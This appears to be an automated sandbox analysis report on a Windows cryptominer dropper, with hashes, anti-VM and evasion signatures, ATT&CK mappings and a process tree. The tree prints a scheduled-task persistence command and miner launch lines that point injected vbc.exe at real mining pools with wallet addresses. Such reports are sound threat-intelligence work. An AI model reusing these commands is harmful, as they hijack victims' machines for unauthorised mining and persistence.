Analysis

  • max time kernel
    299s
  • max time network
    269s
  • platform
    windows10-1703_x64
  • resource
    win10-20220718-en
  • resource tags

    arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system
  • submitted
    05-08-2022 22:15

General

  • Target

    4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

  • Size

    3.4MB

  • MD5

    b67da452eabdb5202468322d11b07c01

  • SHA1

    698f6779381714ec3c7d19840da6a679da918e84

  • SHA256

    4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324

  • SHA512

    2d4547769f16537ca5e9a9c1beba7ee7047594b1789a25223855a9f86fe1eafdf005d69c57b63f5ff65bbad12052226782e5d558323590057d4eac2f90091205

Malware Config

Signatures

  • Detected Stratum cryptominer command 1 IoCs

    Looks to be attempting to contact Stratum mining pool.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Uses the VBS compiler for execution 1 TTPs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
    "C:\Users\Admin\AppData\Local\Temp\4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
      "C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp96F5.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:1388
        • C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
          "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4076
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2696
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
              6⤵
              • Creates scheduled task(s)
              PID:5056
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFiihDJ8WoynFyMePc1sP28nmxoLmatE9n.work -p x -t 4
            5⤵
            • Detected Stratum cryptominer command
            • Suspicious use of WriteProcessMemory
            PID:3164
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              6⤵
                PID:3852
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe --pool stratum://0xd522E4e1279f59e64625757D66ba4Cbb20D6dC0C.WORKER@eu1.ethermine.org:4444 --cinit-max-gpu=80
              5⤵
                PID:4524
      • C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
        C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
        1⤵
        • Executes dropped EXE
        PID:888

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scripting

      1
      T1064

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Virtualization/Sandbox Evasion

      1
      T1497

      Scripting

      1
      T1064

      Discovery

      Query Registry

      2
      T1012

      Virtualization/Sandbox Evasion

      1
      T1497

      System Information Discovery

      3
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
        Filesize

        845KB

        MD5

        93b40ed9ef66ae2c72c9b29cfde49a9a

        SHA1

        90f356d379e9003ec9fba486f87b06e12ace89bc

        SHA256

        7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

        SHA512

        d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

      • C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
        Filesize

        845KB

        MD5

        93b40ed9ef66ae2c72c9b29cfde49a9a

        SHA1

        90f356d379e9003ec9fba486f87b06e12ace89bc

        SHA256

        7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

        SHA512

        d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

      • C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
        Filesize

        845KB

        MD5

        93b40ed9ef66ae2c72c9b29cfde49a9a

        SHA1

        90f356d379e9003ec9fba486f87b06e12ace89bc

        SHA256

        7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

        SHA512

        d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AZWZGASDYNOOA.exe.log
        Filesize

        1KB

        MD5

        9bfb0f51f319fb79c0bb1f4f9fcfc7e1

        SHA1

        367776be8a224b0ee8271dce1723eb675a1964b2

        SHA256

        35d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3

        SHA512

        0b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb

      • C:\Users\Admin\AppData\Local\Temp\tmp96F5.tmp.bat
        Filesize

        153B

        MD5

        48e9d35994db14fd8490ca7749a6c4a6

        SHA1

        5d4a2fb6af759abad61a69d91a575587032092cb

        SHA256

        d4604ffd59f87dae53bd0462b9a04dfdfa82ac48900d39567af80ba3a77f6a6e

        SHA512

        96d491e091a270f95048dcd3eae70d727c24763aff67fc80c969118bc2b7e9a898135c74babc9f2652f3cb8fef4a0b5c3d23f660fe66dabd84e294df62c7fa8a

      • C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
        Filesize

        845KB

        MD5

        93b40ed9ef66ae2c72c9b29cfde49a9a

        SHA1

        90f356d379e9003ec9fba486f87b06e12ace89bc

        SHA256

        7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

        SHA512

        d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

      • C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
        Filesize

        845KB

        MD5

        93b40ed9ef66ae2c72c9b29cfde49a9a

        SHA1

        90f356d379e9003ec9fba486f87b06e12ace89bc

        SHA256

        7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

        SHA512

        d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

      • memory/1388-190-0x0000000000000000-mapping.dmp
      • memory/2388-153-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-116-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-120-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-121-0x0000000000AD0000-0x00000000010F6000-memory.dmp
        Filesize

        6.1MB

      • memory/2388-122-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-123-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-124-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-125-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-126-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-127-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-128-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-157-0x0000000000AD0000-0x00000000010F6000-memory.dmp
        Filesize

        6.1MB

      • memory/2388-130-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-131-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-132-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-133-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-134-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-135-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-136-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-137-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-138-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-139-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-140-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-141-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-142-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-143-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-144-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-145-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-146-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-147-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-148-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-150-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-151-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-159-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-118-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-154-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-155-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-156-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-129-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-119-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-152-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-160-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-161-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-162-0x0000000000AD0000-0x00000000010F6000-memory.dmp
        Filesize

        6.1MB

      • memory/2388-163-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-164-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-165-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-166-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-167-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-168-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-169-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-170-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-171-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-172-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-173-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-174-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-175-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-176-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-177-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-178-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-179-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-182-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-184-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-187-0x0000000000AD0000-0x00000000010F6000-memory.dmp
        Filesize

        6.1MB

      • memory/2388-114-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-115-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-117-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2388-158-0x0000000077290000-0x000000007741E000-memory.dmp
        Filesize

        1.6MB

      • memory/2696-194-0x0000000000000000-mapping.dmp
      • memory/3164-197-0x000000014006EE80-mapping.dmp
      • memory/3164-201-0x0000000140000000-0x00000001400C6000-memory.dmp
        Filesize

        792KB

      • memory/3164-205-0x0000000140000000-0x00000001400C6000-memory.dmp
        Filesize

        792KB

      • memory/3852-200-0x0000000000000000-mapping.dmp
      • memory/4076-191-0x0000000000000000-mapping.dmp
      • memory/4524-203-0x000000014025502C-mapping.dmp
      • memory/4736-186-0x0000000000790000-0x0000000000868000-memory.dmp
        Filesize

        864KB

      • memory/4736-180-0x0000000000000000-mapping.dmp
      • memory/5004-188-0x0000000000000000-mapping.dmp
      • memory/5056-195-0x0000000000000000-mapping.dmp